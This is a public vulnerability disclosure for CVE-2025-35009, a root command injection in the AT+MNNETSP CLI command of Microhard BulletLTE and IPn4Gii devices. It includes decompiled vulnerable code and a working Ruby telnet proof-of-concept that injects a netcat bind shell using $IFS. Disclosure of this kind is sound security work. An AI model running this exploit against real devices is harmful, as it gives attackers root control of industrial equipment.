CVE-2025-35009: Microhard Bullet-LTE and IPn4Gii AT+MNNETSP Argument Injection#

AHA! has discovered an issue with multiple Microhard products, and is issuing this disclosure in accordance with AHA!’s standard disclosure policy on June 8, 2025. CVE-2025-35009 has been assigned to this issue.

Any questions about this disclosure should be directed to [email protected].

Executive Summary#

Products that incorporate the Microhard BulletLTE-NA2 and IPn4Gii-NA2 are vulnerable to a post-authentication command injection issue that can lead to privilege escalation. This is an instance of CWE-88, “Improper Neutralization of Argument Delimiters in a Command (‘Argument Injection’),” and is estimated as a CVSS 7.1.

Technical Details#

A command injection vulnerability exists within the AT+MNNETSP command in the restricted CLI interface of multiple Microhard products. Authentication is required to exploit this vulnerability in that you must have a user account to access the CLI via telnet. However, the service is running as root, so injecting commands allows an attacker to escape the restricted shell and elevate privileges for full access.

The firmware for affected devices contains the binary /bin/clitest, which handles the restricted CLI interface. It is reachable via telnet or ssh connection. It allows the user to run certain config commands as well as AT+ commands to interact with the Quectel modem. One of these AT+ commands is AT+MNNETSP which is used to check network performance against an external server. User input supplied to the cmd_netperf_speed() function in param_3 and is used as an argument for the /usr/bin/speedtest.sh script which is called via system():

undefined4 cmd_netperf_speed(undefined4 param_1,undefined4 param_2,char **param_3,int param_4)
{
    ...
  cli_print(param_1,"Netperf is running, please wait......\n");
  memset(acStack_268,0,0x40);
  strcpy(acStack_268,"cat /dev/null > /var/run/speedtestlog");
  system(acStack_268);
  memset(acStack_268,0,0x40);
  sprintf(acStack_268,"/bin/sh /usr/bin/speedtest.sh %s > /var/run/speedtestlog",acStack_228);
  system(acStack_268);
  memset(acStack_268,0,0x40);
    ...
}

If an attacker wraps input to the AT+MNNETSP command in $() (dollar-parentheses) or backticks (which are tricky to render in Markdown!) they can put whatever command they want and it will be run as the root user. Note that spaces are not allowed, so $IFS must be used instead for space-delimited arguments for the command payload.

The Ruby script below effectively demonstrates an attack using CVE-2025-35009 as a proof-of-concept:

#!/usr/bin/env ruby
require 'net/telnet'
require 'io/console'

if !ARGV[0]
  puts "usage: #{$0} <ip> [<username> <password>]"
  exit(1)
end

target = ARGV[0]
if ARGV[1] && ARGV[2]
  user = ARGV[1]
  pass = ARGV[2]
else
  printf("user: ")
  user = STDIN.gets.chomp
  printf("pass: ")
  pass = STDIN.noecho(&:gets).chomp
  puts ""
end

telnet = Net::Telnet::new("Host" => target, "Timeout" => 2, "Prompt" => /^\w+>/)
telnet.login(user,pass) {|c| print c}
begin
  telnet.cmd("at+mnnetsp=4,`nc$IFS-lvp$IFS\\4444$IFS-e$IFS/bin/sh$IFS-i`") {|c| print c}
rescue
  puts "shell spawned on #{ARGV[0]}:4444"
  pid = spawn("nc -v #{ARGV[0]} 4444")
  Process.wait pid
end

telnet.close

Attacker Value#

If an attacker has a valid credential to the affected Microhard device, and the means to login (for example, over telnet), that attacker can leverage this vulnerability to escape the restricted shell and elevate privileges to root. Industrial control systems (ICS) are often deployed with easy to guess or default credentials, which could be used in conjunction with CVE-2025-35009 to achieve complete, root-level remote control over affected devices.

Credit#

This vulnerability was discovered and documented by Ricky “HeadlessZeke” Lawshae of Keysight.

Timeline#

2025-03-27 (Thu): Presented at regularly scheduled AHA! meeting 0x00df
2025-04-02 (Wed): Contact initiated to several guessed email aliases, such as [email protected], [email protected], etc.
2025-04-02 (Wed): Bounces collected from media@, press@, security@, and secure@. No bounce notification was generated from info@ and support@, though a customer account was required to further communicate with support@, which AHA! does not have.
2025 (April and May): No further communication from the vendor was received.
2025-06-08 (Sun): Verified current IPn4Gii/BulletLTE firmware remains at v1.2.0-r1132
2025-06-08 (Sun): Public disclosure of CVE-2025-35009